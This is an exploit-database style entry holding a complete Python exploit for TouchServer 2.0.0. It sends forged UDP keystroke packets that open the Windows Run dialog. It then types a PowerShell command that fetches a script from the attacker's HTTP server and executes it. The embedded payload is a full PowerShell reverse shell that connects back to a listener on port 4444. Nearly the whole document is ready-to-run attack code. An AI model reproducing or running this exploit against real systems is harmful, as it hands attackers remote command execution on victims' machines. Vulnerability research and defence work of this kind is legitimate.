📄 TouchServer 2.0.0 Remote Code Execution

# Exploit Title: TouchServer 2.0.0 - Remote Code Execution
    # Date: 10/07/25
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/SKRInternationals/SKRInternationals
    # Software Link:
    https://github.com/SKRInternationals/TouchServer/releases/download/v2.0.0/TouchServer-v2.0.0.zip
    # Version: 2.0.0
    # Tested on: Windows 10
    
    '''
    Description:
    
    The vulnerability allows remote attackers to execute arbitrary commands by
    sending specially crafted UDP packets. The exploit delivers a PowerShell
    reverse shell by emulating keyboard input to trigger its download and
    execution.
    
    '''
    
    #!/usr/bin/env python3
    
    
    import socket, json, time, threading, base64
    from http.server import BaseHTTPRequestHandler, HTTPServer
    
    LHOST = "192.168.8.103"
    LPORT = 8080 # http port
    REVERSE_PORT = 4444
    SERVER_IP = "192.168.8.104"
    SERVER_PORT = 5559
    
    VK_SHIFT = 0x10
    VK_RETURN = 0x0D
    VK_LWIN = 0x5B
    VK_R = 0x52
    KEYEVENTF_KEYUP = 0x0002
    
    PS_CMD = f"""$c=New-Object
    Net.Sockets.TCPClient('{LHOST}',{REVERSE_PORT});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length))
    -ne 0){{;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d
    2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'>
    ';$s.Write(([Text.Encoding]::ASCII).GetBytes($r2),0,$r2.Length);$s.Flush()}};$c.Close()"""
    PS_CMD_B64 = base64.b64encode(PS_CMD.encode('utf-16le')).decode()
    
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path == '/ch.ps1':
                self.send_response(200)
                self.send_header('Content-type', 'application/octet-stream')
                self.end_headers()
                self.wfile.write(PS_CMD.encode())
            else:
                self.send_response(404)
    
    def run_server():
        HTTPServer(('0.0.0.0', LPORT), Handler).serve_forever()
    
    CHAR_MAP = {
        ' ': 0x20, '-': 0xBD, '.': 0xBE, '/': 0xBF, '\\': 0xDC, "'": 0xDE,
        ';': 0xBA, '$': (VK_SHIFT, 0x34), ':': (VK_SHIFT, 0xBA), '"':
    (VK_SHIFT, 0xDE),
        ',': 0xBC, '=': 0xBB, '&': (VK_SHIFT, 0x37), '(': (VK_SHIFT, 0x39),
        ')': (VK_SHIFT, 0x30), '{': (VK_SHIFT, 0xDB), '}': (VK_SHIFT, 0xDD),
        '[': 0xDB, ']': 0xDD, '|': (VK_SHIFT, 0xDC), '%': (VK_SHIFT, 0x35)
    }
    
    def send_key(vk, flags=0):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(json.dumps({
            "type": "1",
            "wVk": str(vk),
            "wScan": "0",
            "dwFlags": str(flags),
            "time": "0",
            "dwExtraInfo": "0"
        }).encode(), (SERVER_IP, SERVER_PORT))
        sock.close()
        time.sleep(0.05)
    
    def type_char(c):
        l = c.lower()
        if 'a' <= l <= 'z':
            vk = 0x41 + (ord(l) - ord('a'))
            send_key(vk)
            send_key(vk, KEYEVENTF_KEYUP)
        elif '0' <= c <= '9':
            vk = 0x30 + (ord(c) - ord('0'))
            send_key(vk)
            send_key(vk, KEYEVENTF_KEYUP)
        elif c in CHAR_MAP:
            code = CHAR_MAP[c]
            if isinstance(code, tuple):
                send_key(code[0])
                send_key(code[1])
                send_key(code[1], KEYEVENTF_KEYUP)
                send_key(code[0], KEYEVENTF_KEYUP)
            else:
                send_key(code)
                send_key(code, KEYEVENTF_KEYUP)
    
    def type_str(t):
        for c in t: type_char(c)
    
    def win_r():
        send_key(VK_LWIN)
        send_key(VK_R)
        send_key(VK_R, KEYEVENTF_KEYUP)
        send_key(VK_LWIN, KEYEVENTF_KEYUP)
        time.sleep(0.5)
    
    def enter():
        send_key(VK_RETURN)
        send_key(VK_RETURN, KEYEVENTF_KEYUP)
    
    if __name__ == "__main__":
        threading.Thread(target=run_server, daemon=True).start()
        win_r()
        type_str(f"powershell iex(iwr http://{LHOST}:{LPORT}/ch.ps1
    -UseBasicParsing)")
        enter()
        while True: time.sleep(1)